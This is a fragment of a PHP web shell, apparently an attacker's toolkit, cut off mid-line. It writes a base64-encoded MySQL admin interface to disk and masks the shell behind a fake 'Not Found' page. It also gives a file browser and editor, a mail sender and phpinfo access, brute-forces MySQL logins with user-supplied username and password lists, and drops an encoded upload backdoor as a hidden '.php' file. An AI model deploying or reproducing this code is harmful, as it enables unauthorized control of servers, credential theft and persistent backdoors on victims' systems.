GVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==\'; \r\n$file = fopen("db-sql.php" ,"w+");\r\n$write = fwrite ($file ,base64_decode($sqlshell));\r\nfclose($file);\r\n    chmod("db-sql.php", 0644);\r\n$indexshell = fopen("index.php" ,"w+");\r\n$data = \'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+\';\r\n$tulis = fwrite( $indexshell, base64_decode($data));\r\nfclose($indexshell);\r\n   echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; \r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){\r\nif(isset($_POST[\'mail_send\'])){\r\n\t$mail_to = $_POST[\'mail_to\'];\r\n\t$mail_from = $_POST[\'mail_from\'];\r\n\t$mail_subject = $_POST[\'mail_subject\'];\r\n\t$mail_content = magicboom($_POST[\'mail_content\']);\r\n\tif(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){\r\n\t\t$msg = "email sent to $mail_to";\r\n\t}\r\n\telse $msg = "send email failed";\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>\r\n<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>\r\n<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n\r\n<?php }\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ \r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\techo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>";\r\n}\r\nelseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){\r\n  if(is_file($_GET[\'view\'])){ \r\n\tif(!isset($file)) $file = magicboom($_GET[\'view\']);\r\n\tif(!$win && $posix){\r\n\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t}\r\n\telse {\r\n\t\t$owner = $user;\r\n\t}\r\n\t$filn = basename($file);\r\n\techo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\">\r\n\t<tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span>\r\n\t<form action=\\"?y=".$pwd."&amp;view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" />\r\n\t</form>\r\n\t</td></tr>\r\n\t<tr><td>Size</td><td>".ukuran($file)."</td></tr>\r\n\t<tr><td>Permission</td><td>".get_perms($file)."</td></tr>\r\n\t<tr><td>Owner</td><td>".$owner."</td></tr>\r\n\t<tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>\r\n\t<tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>\r\n\t<tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>\r\n\t<tr><td>Actions</td><td><a href=\\"?y=$pwd&amp;edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$file\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$file\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$file\\">gzip</a>)</td></tr>\r\n\t<tr><td>View</td><td><a href=\\"?y=".$pwd."&amp;view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=code\\">code</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=image\\">image</a></td></tr>\r\n\t</table>\r\n\t";\r\n\tif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){\r\n\t\techo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&amp;img=".$filn."\\"></div>";\r\n\t}\r\n\telseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\t$file = wordwrap(@file_get_contents($file),"240","\\n");\r\n\t\t@highlight_string($file);\r\n\t\techo "</div>";\r\n\t}\r\n\telse {\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\techo nl2br(htmlentities((@file_get_contents($file))));\r\n\t\techo "</div>";\r\n\t}\r\n  }\r\n  elseif(is_dir($_GET[\'view\'])){\r\n\t\techo showdir($pwd,$prompt);\r\n  }\r\n\t\r\n}\r\nelseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){\r\n\r\n\t\tif(isset($_POST[\'save\'])){\r\n\t\t\t$file = $_POST[\'saveas\'];\r\n\t\t\t$content = magicboom($_POST[\'content\']);\r\n\t\t\tif($filez = @fopen($file,"w")){\r\n\t\t\t\t$time = date("d-M-Y H:i",time());\r\n\t\t\t\tif(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time;\r\n\t\t\t\telse $msg = "failed to save";\r\n\t\t\t\t@fclose($filez);\r\n\t\t\t}\r\n\t\t\telse $msg = "permission denied";\r\n\t\t}\r\n\t\tif(!isset($file)) $file = $_GET[\'edit\'];\r\n\t\tif($filez = @fopen($file,"r")){\r\n\t\t\t$content = "";\r\n\t\t\twhile(!feof($filez)){\r\n\t\t\t\t$content .= htmlentities(str_replace("\'\'","\'",fgets($filez)));\r\n\t\t\t}\r\n\t\t\t@fclose($filez);\r\n\t\t}\r\n\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" name="content">\r\n<?php echo $content; ?>\r\n</textarea>\r\n<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />\r\n&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n<?php\r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'logout\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">\r\n\r\n<?php\r\n    unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]); \r\n    echo \'bye!\'; \r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'brute\'))\r\n\t\t\t{\t\r\n\t\t\t?>\r\n\t\t\t\t<form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">\r\n\t\t\t<?php\r\n\t\t\t//bruteforce\r\n?>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\r\n<?php\r\n/*\r\nRecoded By X\'1n73ct\r\n*/\r\n@set_time_limit(0);\r\n@error_reporting(0);\r\n\r\n\r\nif($_POST[\'page\']==\'find\')\r\n{\r\nif(isset($_POST[\'usernames\']) && isset($_POST[\'passwords\']))\r\n{\r\n    if($_POST[\'type\'] == \'passwd\'){\r\n        $e = explode("\\n",$_POST[\'usernames\']);\r\n        foreach($e as $value){\r\n        $k = explode(":",$value);\r\n        $username .= $k[\'0\']." ";\r\n        }\r\n    }elseif($_POST[\'type\'] == \'simple\'){\r\n        $username = str_replace("\\n",\' \',$_POST[\'usernames\']);\r\n    }\r\n    $a1 = explode(" ",$username);\r\n    $a2 = explode("\\n",$_POST[\'passwords\']);\r\n    $id2 = count($a2);\r\n    $ok = 0;\r\n    foreach($a1 as $user )\r\n    {\r\n        if($user !== \'\')\r\n        {\r\n        $user=trim($user);\r\n         for($i=0;$i<=$id2;$i++)\r\n         {\r\n            $pass = trim($a2[$i]);\r\n            if(@mysql_connect(\'localhost\',$user,$pass))\r\n            {\r\n                echo "X\'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";\r\n                $ok++;\r\n            }\r\n         }\r\n        }\r\n    }\r\n    echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x\'1n73ct</b>";\r\n    echo "<center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\n    exit;\r\n}\r\n}\r\nif($_POST[\'pass\']==\'password\'){\r\n@error_reporting(0);\r\n$i = getenv(\'REMOTE_ADDR\');\r\n$d = date(\'D, M jS, Y H:i\',time());\r\n$h = $_SERVER[\'HTTP_HOST\'];\r\n$dir=$_SERVER[\'PHP_SELF\'];\r\n$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";\r\n$file = fopen(".php","w+");\r\n$write = fwrite ($file ,base64_decode($back));\r\nfclose($file);\r\nchmod(".php",0755);\r\nmkdir(\'config\',0755);\r\n$cp 